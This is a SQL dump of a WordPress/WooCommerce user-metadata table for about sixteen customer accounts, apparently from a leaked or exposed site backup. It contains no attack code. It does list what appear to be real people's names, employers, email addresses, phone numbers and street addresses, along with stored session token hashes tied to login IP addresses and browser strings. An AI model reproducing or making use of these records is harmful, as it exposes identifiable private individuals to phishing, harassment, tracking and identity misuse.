INSERT INTO `wp_usermeta` VALUES (9274, 566, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9275, 566, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9276, 566, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9277, 566, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9278, 566, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9279, 566, '_yoast_wpseo_profile_updated', '1490192167'); 
INSERT INTO `wp_usermeta` VALUES (9281, 566, 'billing_first_name', 'Reyes'); 
INSERT INTO `wp_usermeta` VALUES (9282, 566, 'billing_last_name', 'Vivas'); 
INSERT INTO `wp_usermeta` VALUES (9283, 566, 'billing_company', 'RITS USA, LLC'); 
INSERT INTO `wp_usermeta` VALUES (9284, 566, 'billing_email', 'reyesjvivas@gmail.com'); 
INSERT INTO `wp_usermeta` VALUES (9285, 566, 'billing_phone', '7708311480'); 
INSERT INTO `wp_usermeta` VALUES (9286, 566, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (9287, 566, 'billing_address_1', '4978 Shelley Lane'); 
INSERT INTO `wp_usermeta` VALUES (9288, 566, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (9289, 566, 'billing_city', 'Sugar Hill'); 
INSERT INTO `wp_usermeta` VALUES (9290, 566, 'billing_state', 'GA'); 
INSERT INTO `wp_usermeta` VALUES (9291, 566, 'billing_postcode', '30518'); 
INSERT INTO `wp_usermeta` VALUES (9292, 566, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9293, 567, 'nickname', 'nikolas.kastor'); 
INSERT INTO `wp_usermeta` VALUES (9294, 567, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9295, 567, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9296, 567, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9297, 567, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9298, 567, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9299, 567, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9300, 567, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9301, 567, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9302, 567, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9303, 567, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9304, 567, '_yoast_wpseo_profile_updated', '1490199464'); 
INSERT INTO `wp_usermeta` VALUES (9305, 567, 'session_tokens', 'a:1:{s:64:"d3dccb12091d56369f49d326667236a8b544f7a7489565a473f9d3101c389925";a:4:{s:10:"expiration";i:1491409075;s:2:"ip";s:13:"130.64.17.204";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490199475;}}'); 
INSERT INTO `wp_usermeta` VALUES (9306, 568, 'nickname', 'KMAROSE'); 
INSERT INTO `wp_usermeta` VALUES (9307, 568, 'first_name', 'Kathy'); 
INSERT INTO `wp_usermeta` VALUES (9308, 568, 'last_name', 'Marose'); 
INSERT INTO `wp_usermeta` VALUES (9309, 568, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9310, 568, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9311, 568, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9312, 568, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9313, 568, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9314, 568, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9315, 568, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9316, 568, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9317, 568, '_yoast_wpseo_profile_updated', '1490200684'); 
INSERT INTO `wp_usermeta` VALUES (9318, 568, 'session_tokens', 'a:1:{s:64:"1c6977a342bc5cd805f3d9875005228fe9a085868a043ca344736d558968d1f9";a:4:{s:10:"expiration";i:1491410293;s:2:"ip";s:10:"50.50.0.50";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490200693;}}'); 
INSERT INTO `wp_usermeta` VALUES (9319, 568, 'billing_first_name', 'Kathy'); 
INSERT INTO `wp_usermeta` VALUES (9320, 568, 'billing_last_name', 'Marose'); 
INSERT INTO `wp_usermeta` VALUES (9321, 568, 'billing_company', 'Simpson Electric Company'); 
INSERT INTO `wp_usermeta` VALUES (9322, 568, 'billing_email', 'kmarose@simpsonelectric.com'); 
INSERT INTO `wp_usermeta` VALUES (9323, 568, 'billing_phone', '715-588-3311'); 
INSERT INTO `wp_usermeta` VALUES (9324, 568, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (9325, 568, 'billing_address_1', '520 Simpson Ave'); 
INSERT INTO `wp_usermeta` VALUES (9326, 568, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (9327, 568, 'billing_city', 'Lac du Flambeau'); 
INSERT INTO `wp_usermeta` VALUES (9328, 568, 'billing_state', 'WI'); 
INSERT INTO `wp_usermeta` VALUES (9329, 568, 'billing_postcode', '54538'); 
INSERT INTO `wp_usermeta` VALUES (9330, 568, 'last_update', '1490200851'); 
INSERT INTO `wp_usermeta` VALUES (9331, 498, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9332, 569, 'nickname', 'nicholas.fraga'); 
INSERT INTO `wp_usermeta` VALUES (9333, 569, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9334, 569, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9335, 569, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9336, 569, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9337, 569, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9338, 569, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9339, 569, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9340, 569, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9341, 569, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9342, 569, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9343, 569, '_yoast_wpseo_profile_updated', '1490206941'); 
INSERT INTO `wp_usermeta` VALUES (9344, 569, 'session_tokens', 'a:1:{s:64:"2c9de1f4bb482c89587b7ae58f1d4252ed94d472a10f47c8bb59e3098210f714";a:4:{s:10:"expiration";i:1491416548;s:2:"ip";s:10:"23.141.0.5";s:2:"ua";s:186:"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; .NET4.0C; .NET4.0E)";s:5:"login";i:1490206948;}}'); 
INSERT INTO `wp_usermeta` VALUES (9345, 570, 'nickname', 'mstempki'); 
INSERT INTO `wp_usermeta` VALUES (9346, 570, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9347, 570, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9348, 570, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9349, 570, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9350, 570, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9351, 570, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9352, 570, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9353, 570, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9354, 570, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9355, 570, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9356, 570, '_yoast_wpseo_profile_updated', '1490207013'); 
INSERT INTO `wp_usermeta` VALUES (9357, 570, 'session_tokens', 'a:2:{s:64:"5e0b2ffa3a7fa02f7f61b2ce46cf39f93523b8f4088061aa5d2792451c1183c8";a:4:{s:10:"expiration";i:1491416622;s:2:"ip";s:15:"204.136.186.128";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490207022;}s:64:"9e1f7eb21e91e3a173ec442a35a1963c286875dc511147df0662fe9bffd8a632";a:4:{s:10:"expiration";i:1490379973;s:2:"ip";s:15:"204.136.186.128";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490207173;}}'); 
INSERT INTO `wp_usermeta` VALUES (9358, 571, 'nickname', 'john.rohwer'); 
INSERT INTO `wp_usermeta` VALUES (9359, 571, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9360, 571, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9361, 571, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9362, 571, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9363, 571, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9364, 571, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9365, 571, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9366, 571, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9367, 571, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9368, 571, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9369, 571, '_yoast_wpseo_profile_updated', '1490213337'); 
INSERT INTO `wp_usermeta` VALUES (9370, 571, 'session_tokens', 'a:1:{s:64:"af58ee3a6a257ea9137a6db38ca43a15852ad28b6716c02762f6841bf2c72112";a:4:{s:10:"expiration";i:1491422945;s:2:"ip";s:14:"209.121.141.42";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490213345;}}'); 
INSERT INTO `wp_usermeta` VALUES (9371, 572, 'nickname', 'ahartman'); 
INSERT INTO `wp_usermeta` VALUES (9372, 572, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9373, 572, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9374, 572, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9375, 572, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9376, 572, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9377, 572, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9378, 572, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9379, 572, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9380, 572, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9381, 572, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9382, 572, '_yoast_wpseo_profile_updated', '1490214344'); 
INSERT INTO `wp_usermeta` VALUES (9383, 572, 'session_tokens', 'a:1:{s:64:"fbe7c962157ac30be36541c910e0fc77fae0d1789cc26220aac5b58b212c4fa7";a:4:{s:10:"expiration";i:1491423952;s:2:"ip";s:11:"75.27.152.4";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490214352;}}'); 
INSERT INTO `wp_usermeta` VALUES (9384, 573, 'nickname', 'rachelle.byrd'); 
INSERT INTO `wp_usermeta` VALUES (9385, 573, 'first_name', 'Rachelle'); 
INSERT INTO `wp_usermeta` VALUES (9386, 573, 'last_name', 'Byrd'); 
INSERT INTO `wp_usermeta` VALUES (9387, 573, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9388, 573, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9389, 573, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9390, 573, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9391, 573, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9392, 573, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9393, 573, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9394, 573, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9395, 573, '_yoast_wpseo_profile_updated', '1490219131'); 
INSERT INTO `wp_usermeta` VALUES (9396, 573, 'session_tokens', 'a:1:{s:64:"4a7fa587bf7ec287c5893051a9185a62210148c9f1cb1a6194cc8e0099782180";a:4:{s:10:"expiration";i:1491428739;s:2:"ip";s:12:"23.25.106.41";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1490219139;}}'); 
INSERT INTO `wp_usermeta` VALUES (9397, 573, 'last_update', '1490219196'); 
INSERT INTO `wp_usermeta` VALUES (9398, 573, 'billing_first_name', 'Rachelle'); 
INSERT INTO `wp_usermeta` VALUES (9399, 573, 'billing_last_name', 'Byrd'); 
INSERT INTO `wp_usermeta` VALUES (9400, 573, 'billing_company', 'SIMCO Electronics'); 
INSERT INTO `wp_usermeta` VALUES (9401, 573, 'billing_email', 'rachelle.byrd@simco.com'); 
INSERT INTO `wp_usermeta` VALUES (9402, 573, 'billing_phone', '202-969-2827'); 
INSERT INTO `wp_usermeta` VALUES (9403, 573, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (9404, 573, 'billing_address_1', '22705 Dulles Summit Court'); 
INSERT INTO `wp_usermeta` VALUES (9405, 573, 'billing_address_2', 'Suite 160'); 
INSERT INTO `wp_usermeta` VALUES (9406, 573, 'billing_city', 'Dulles'); 
INSERT INTO `wp_usermeta` VALUES (9407, 573, 'billing_state', 'VA'); 
INSERT INTO `wp_usermeta` VALUES (9408, 573, 'billing_postcode', '20166'); 
INSERT INTO `wp_usermeta` VALUES (9409, 573, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9410, 574, 'nickname', 'cwithrow'); 
INSERT INTO `wp_usermeta` VALUES (9411, 574, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9412, 574, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9413, 574, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9414, 574, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9415, 574, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9416, 574, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9417, 574, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9418, 574, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9419, 574, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9420, 574, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9421, 574, '_yoast_wpseo_profile_updated', '1490274447'); 
INSERT INTO `wp_usermeta` VALUES (9422, 574, 'session_tokens', 'a:1:{s:64:"0e2f4f2860ae16fae4d82a8cec88db68060cb121d0b0647cc371ac5e62d4a746";a:4:{s:10:"expiration";i:1491484057;s:2:"ip";s:12:"24.106.92.10";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490274457;}}'); 
INSERT INTO `wp_usermeta` VALUES (9423, 575, 'nickname', 'kgarbellini'); 
INSERT INTO `wp_usermeta` VALUES (9424, 575, 'first_name', 'KENNETH'); 
INSERT INTO `wp_usermeta` VALUES (9425, 575, 'last_name', 'GARBELLINI'); 
INSERT INTO `wp_usermeta` VALUES (9426, 575, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9427, 575, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9428, 575, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9429, 575, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9430, 575, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9431, 575, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9432, 575, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9433, 575, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9434, 575, '_yoast_wpseo_profile_updated', '1490279269'); 
INSERT INTO `wp_usermeta` VALUES (9435, 575, 'session_tokens', 'a:2:{s:64:"2d71a19344f4b0adf47a2313c53bc44d8a599629fd14f87401b97e3573cd6c3c";a:4:{s:10:"expiration";i:1491488877;s:2:"ip";s:12:"98.174.84.17";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490279277;}s:64:"5c6a17d508603bd80d1373776869f60ed4d863a06a2d58070ce96f5ba4236307";a:4:{s:10:"expiration";i:1491488965;s:2:"ip";s:12:"98.174.84.17";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490279365;}}'); 
INSERT INTO `wp_usermeta` VALUES (9436, 575, 'billing_first_name', 'KENNETH'); 
INSERT INTO `wp_usermeta` VALUES (9437, 575, 'billing_last_name', 'GARBELLINI'); 
INSERT INTO `wp_usermeta` VALUES (9438, 575, 'billing_company', 'MW INDUSTRIES/ECONOMY SPRING'); 
INSERT INTO `wp_usermeta` VALUES (9439, 575, 'billing_email', 'kgarbellini@mw-ind.com'); 
INSERT INTO `wp_usermeta` VALUES (9440, 575, 'billing_phone', '18606217358'); 
INSERT INTO `wp_usermeta` VALUES (9441, 575, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (9442, 575, 'billing_address_1', '29 DE PAOLO DRIVE'); 
INSERT INTO `wp_usermeta` VALUES (9443, 575, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (9444, 575, 'billing_city', 'SOUTHINGTON'); 
INSERT INTO `wp_usermeta` VALUES (9445, 575, 'billing_state', 'CT'); 
INSERT INTO `wp_usermeta` VALUES (9446, 575, 'billing_postcode', '06489'); 
INSERT INTO `wp_usermeta` VALUES (9447, 575, 'last_update', '1490279359'); 
INSERT INTO `wp_usermeta` VALUES (9448, 576, 'nickname', 'rcostello'); 
INSERT INTO `wp_usermeta` VALUES (9449, 576, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9450, 576, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9451, 576, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9452, 576, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9453, 576, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9454, 576, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9455, 576, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9456, 576, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9457, 576, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9458, 576, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9459, 576, '_yoast_wpseo_profile_updated', '1490279884'); 
INSERT INTO `wp_usermeta` VALUES (9460, 576, 'session_tokens', 'a:2:{s:64:"065c957c5da3a21ca2832b8070680ba1594f21a4f64018a11a38268be42549fc";a:4:{s:10:"expiration";i:1491489498;s:2:"ip";s:13:"38.77.131.130";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490279898;}s:64:"2386d05e6ce089e49f915bcd680957180aa676c41c1e9e5480e5d5e1de900ed7";a:4:{s:10:"expiration";i:1490452701;s:2:"ip";s:13:"38.77.131.130";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490279901;}}'); 
INSERT INTO `wp_usermeta` VALUES (9461, 577, 'nickname', 'GUOR1001'); 
INSERT INTO `wp_usermeta` VALUES (9462, 577, 'first_name', 'GUO'); 
INSERT INTO `wp_usermeta` VALUES (9463, 577, 'last_name', 'RAN'); 
INSERT INTO `wp_usermeta` VALUES (9464, 577, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9465, 577, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9466, 577, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9467, 577, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9468, 577, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9469, 577, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9470, 577, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9471, 577, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9472, 577, '_yoast_wpseo_profile_updated', '1490281314'); 
INSERT INTO `wp_usermeta` VALUES (9474, 577, 'billing_first_name', 'GUO'); 
INSERT INTO `wp_usermeta` VALUES (9475, 577, 'billing_last_name', 'RAN'); 
INSERT INTO `wp_usermeta` VALUES (9476, 577, 'billing_company', 'TEXAS TRANSACTOR'); 
INSERT INTO `wp_usermeta` VALUES (9477, 577, 'billing_email', 'guor1001@texastransactor.com'); 
INSERT INTO `wp_usermeta` VALUES (9478, 577, 'billing_phone', '361-946-6098'); 
INSERT INTO `wp_usermeta` VALUES (9479, 577, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (9480, 577, 'billing_address_1', '6998 LOVERS LANE'); 
INSERT INTO `wp_usermeta` VALUES (9481, 577, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (9482, 577, 'billing_city', 'CORPUS CHRISTI'); 
INSERT INTO `wp_usermeta` VALUES (9483, 577, 'billing_state', 'TX'); 
INSERT INTO `wp_usermeta` VALUES (9484, 577, 'billing_postcode', '78412'); 
INSERT INTO `wp_usermeta` VALUES (9485, 577, 'last_update', '1490281459'); 
INSERT INTO `wp_usermeta` VALUES (9486, 577, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9487, 578, 'nickname', 'ross.mcgowen'); 
INSERT INTO `wp_usermeta` VALUES (9488, 578, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9489, 578, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9490, 578, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9491, 578, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9492, 578, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9493, 578, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9494, 578, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9495, 578, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9496, 578, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9497, 578, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9498, 578, '_yoast_wpseo_profile_updated', '1490283243'); 
INSERT INTO `wp_usermeta` VALUES (9499, 578, 'session_tokens', 'a:1:{s:64:"25be1d4a18ff0c0155e90114a0e993182ef0bb68debbb915eaeb09ce7f760a0b";a:4:{s:10:"expiration";i:1491492852;s:2:"ip";s:13:"50.234.88.108";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490283252;}}'); 
INSERT INTO `wp_usermeta` VALUES (9500, 579, 'nickname', 'matthew.dirmyer'); 
INSERT INTO `wp_usermeta` VALUES (9501, 579, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9502, 579, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9503, 579, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9504, 579, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9505, 579, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9506, 579, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9507, 579, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9508, 579, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9509, 579, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9510, 579, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9511, 579, '_yoast_wpseo_profile_updated', '1490283366'); 
INSERT INTO `wp_usermeta` VALUES (9512, 579, 'session_tokens', 'a:1:{s:64:"a4c26c36d4f330cc1a540040a1f3dfb77950a17e2aae0c59c834215f9cd37056";a:4:{s:10:"expiration";i:1491492977;s:2:"ip";s:12:"192.12.184.7";s:2:"ua";s:120:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490283377;}}'); 
INSERT INTO `wp_usermeta` VALUES (9513, 580, 'nickname', 'Gmobile'); 
INSERT INTO `wp_usermeta` VALUES (9514, 580, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9515, 580, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9516, 580, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9517, 580, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9518, 580, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9519, 580, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9520, 580, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9521, 580, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9522, 580, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9523, 580, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9524, 580, '_yoast_wpseo_profile_updated', '1490286634'); 
INSERT INTO `wp_usermeta` VALUES (9525, 580, 'session_tokens', 'a:1:{s:64:"82d9802f858f9d29ad44260b940713ddff69a10263f70b4ed232a36652c3ce44";a:4:{s:10:"expiration";i:1491496250;s:2:"ip";s:14:"143.72.236.210";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490286650;}}'); 
INSERT INTO `wp_usermeta` VALUES (9526, 581, 'nickname', 'nreis'); 
INSERT INTO `wp_usermeta` VALUES (9527, 581, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9528, 581, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9529, 581, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9530, 581, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9531, 581, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9532, 581, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9533, 581, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9534, 581, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9535, 581, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9536, 581, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9537, 581, '_yoast_wpseo_profile_updated', '1490295270'); 
